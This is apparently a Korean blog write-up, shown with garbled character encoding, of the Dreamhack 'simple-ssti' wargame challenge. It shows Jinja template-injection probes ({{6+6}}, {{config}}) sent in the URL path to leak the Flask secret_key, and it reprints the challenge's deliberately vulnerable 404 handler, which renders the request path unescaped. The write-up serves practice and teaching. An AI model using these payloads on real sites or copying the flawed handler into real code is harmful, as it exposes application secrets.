๐Ÿ”’ Cyber Security/Web Hacking (์›นํ•ดํ‚น)

[Dreamhack] ๋“œ๋ฆผํ•ต ์›นํ•ดํ‚น: simple-ssti

์„ ๋‹ฌ 2023. 11. 17. 12:14
๋ฐ˜์‘ํ˜•

https://dreamhack.io/wargame/challenges/39

 

simple-ssti

์กด์žฌํ•˜์ง€ ์•Š๋Š” ํŽ˜์ด์ง€ ๋ฐฉ๋ฌธ์‹œ 404 ์—๋Ÿฌ๋ฅผ ์ถœ๋ ฅํ•˜๋Š” ์„œ๋น„์Šค์ž…๋‹ˆ๋‹ค. SSTI ์ทจ์•ฝ์ ์„ ์ด์šฉํ•ด ํ”Œ๋ž˜๊ทธ๋ฅผ ํš๋“ํ•˜์„ธ์š”. ํ”Œ๋ž˜๊ทธ๋Š” flag.txt, FLAG ๋ณ€์ˆ˜์— ์žˆ์Šต๋‹ˆ๋‹ค. Reference Server-side Basic

dreamhack.io

 

๋ฌธ์ œ์„ค๋ช…

์กด์žฌํ•˜์ง€ ์•Š๋Š” ํŽ˜์ด์ง€ ๋ฐฉ๋ฌธ์‹œ 404 ์—๋Ÿฌ๋ฅผ ์ถœ๋ ฅํ•˜๋Š” ์„œ๋น„์Šค์ž…๋‹ˆ๋‹ค.
SSTI ์ทจ์•ฝ์ ์„ ์ด์šฉํ•ด ํ”Œ๋ž˜๊ทธ๋ฅผ ํš๋“ํ•˜์„ธ์š”. ํ”Œ๋ž˜๊ทธ๋Š” flag.txt, FLAG ๋ณ€์ˆ˜์— ์žˆ์Šต๋‹ˆ๋‹ค.

 

ํ’€์ด

SSTI์— ๋Œ€ํ•ด์„œ ์•Œ๊ณ  ์žˆ์–ด์•ผํ•˜๋Š” ๋ฌธ์ œ. ๋˜ Flask์— ๋Œ€ํ•œ ๋ฐฐ๊ฒฝ ์ง€์‹๋„ ํ•„์š”ํ•˜๋‹ค

ํ•„์ž๋Š” Flask๋ฅผ ์ด์šฉํ•ด๋ณธ ์ ์ด ์žˆ์–ด์„œ (์ •๋ง ๊ฐ„๋‹จํ•œ ๋ธ”๋กœ๊ทธ ์ž๋™ ๋ชฉ์ฐจ ์ƒ์„ฑ๊ธฐ ํ”„๋กœ์ ํŠธ๋ฅผ ๋งŒ๋“ค๊ธฐ ์œ„ํ•ด ์‚ฌ์šฉํ–ˆ์—ˆ๋‹ค) ์–ด๋Š์ •๋„ ๊ตฌ์กฐ์™€ ๋ฌธ๋ฒ•์„ ์•„๋Š” ์ƒํƒœ์ง€๋งŒ ์ž˜ ๋ชจ๋ฅด๋Š” ๊ฒฝ์šฐ ์•„๋ž˜ ์นœ์ ˆํ•˜๊ฒŒ ์„ค๋ช…ํ•ด๋†“์€ ๊ธ€์„ ์ฐธ๊ณ ํ•˜๋ฉด ์ข‹์„ ๋“ฏ ํ•˜๋‹ค

 

๋ฐ˜์‘ํ˜•
 

์›น ํ…œํ”Œ๋ฆฟ ์—”์ง„ ๊ธฐ๋ฐ˜์˜ SSTI ์ทจ์•ฝ์  ๋ถ„์„

01. SSTI ์ทจ์•ฝ์ ์„ ์ดํ•ดํ•˜๊ธฐ ์œ„ํ•œ ์‚ฌ์ „ ๋‹จ๊ณ„ SSTI(Server Side Template Injection)์ทจ์•ฝ์ ์€ ์›น ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜์— ์ ์šฉ๋˜์–ด ์žˆ๋Š” ์›น ํ…œํ”Œ๋ฆฟ ์—”์ง„(Web Template Engine)์— ๊ณต๊ฒฉ์ž์˜ ๊ณต๊ฒฉ ์ฝ”๋“œ๊ฐ€ ํ…œํ”Œ๋ฆฟ์— ํฌํ•จ๋œ ์ƒํƒœ

www.igloo.co.kr

 

๋”ฐ๋กœ ๊ธฐ๋Šฅ์กฐ์ฐจ ์—†๋Š”๋ฐ, ๊ทธ๋ƒฅ ๊ฒฝ๋กœ๋ฅผ ์ž…๋ ฅํ•˜๋ฉด ๊ทธ ๊ฒฝ๋กœ๋ฅผ ์ถœ๋ ฅํ•ด์ค€๋‹ค

 

http://host3.dreamhack.games:19321/์•ˆ๋…•

 

๊ฒฝ๋กœ์— ์žˆ๋Š” ๋ฌธ์ž์—ด์„ ๊ทธ๋Œ€๋กœ ์ถœ๋ ฅํ•˜๊ณ  ์žˆ์œผ๋‹ˆ ์ด์ œ ์—ฐ์‚ฐ์„ ํ•ด๋ณด์ž

{{6+6}} ์„ ๋„ฃ์–ด์„œ ์—ฐ์‚ฐ์ด ๋œ๋‹ค๋ฉด Jinja(flask์—์„œ ์‚ฌ์šฉํ•˜๋Š” ํ…œํ”Œ๋ฆฟ ์—”์ง„)๋‹ˆ๊นŒ ์ดํ›„ ์ž‘์—…์ด ๊ฐ€๋Šฅํ•˜๋‹ค

 

http://host3.dreamhack.games:19321/{{6+6}}

 

์•„์ฃผ ์ž˜๋œ๋‹ค

 

http://host3.dreamhack.games:19321/{{config}}

 

http://host3.dreamhack.games:19321/{{config}}

๋ฅผ ์ž…๋ ฅํ–ˆ๋”๋‹ˆ config ์ •๋ณด๊ฐ€ ์ญ‰ ๋‚˜์˜ค๊ณ  ์ด ์•ˆ์— ์žˆ๋Š” secret_key ์— ํ”Œ๋ž˜๊ทธ๊ฐ€ ํฌํ•จ๋˜์–ด์žˆ๋‹ค

 

#!/usr/bin/python3
from flask import Flask, request, render_template, render_template_string, make_response, redirect, url_for
import socket

app = Flask(__name__)

try:
    FLAG = open('./flag.txt', 'r').read()
except:
    FLAG = '[**FLAG**]'

app.secret_key = FLAG


@app.route('/')
def index():
    return render_template('index.html')

@app.errorhandler(404)
def Error404(e):
    template = '''
    <div class="center">
        <h1>Page Not Found.</h1>
        <h3>%s</h3>
    </div>
''' % (request.path)
    return render_template_string(template), 404

app.run(host='0.0.0.0', port=8000)

 

๋ฌธ์ œ ์ฝ”๋“œ๋ฅผ ๋ณด๋ฉด FLAG๊ฐ€ app.secret_key ์— ํฌํ•จ๋˜์–ด์žˆ๊ธฐ ๋•Œ๋ฌธ์— config์—์„œ secret_key ๋ฅผ ์ฐพ์•„๋ณด๋Š” ๋ฐฉ์‹์œผ๋กœ ํ•ด๋„ ๊ฐ€๋Šฅํ•˜๋‹ค

๋ฐ˜์‘ํ˜•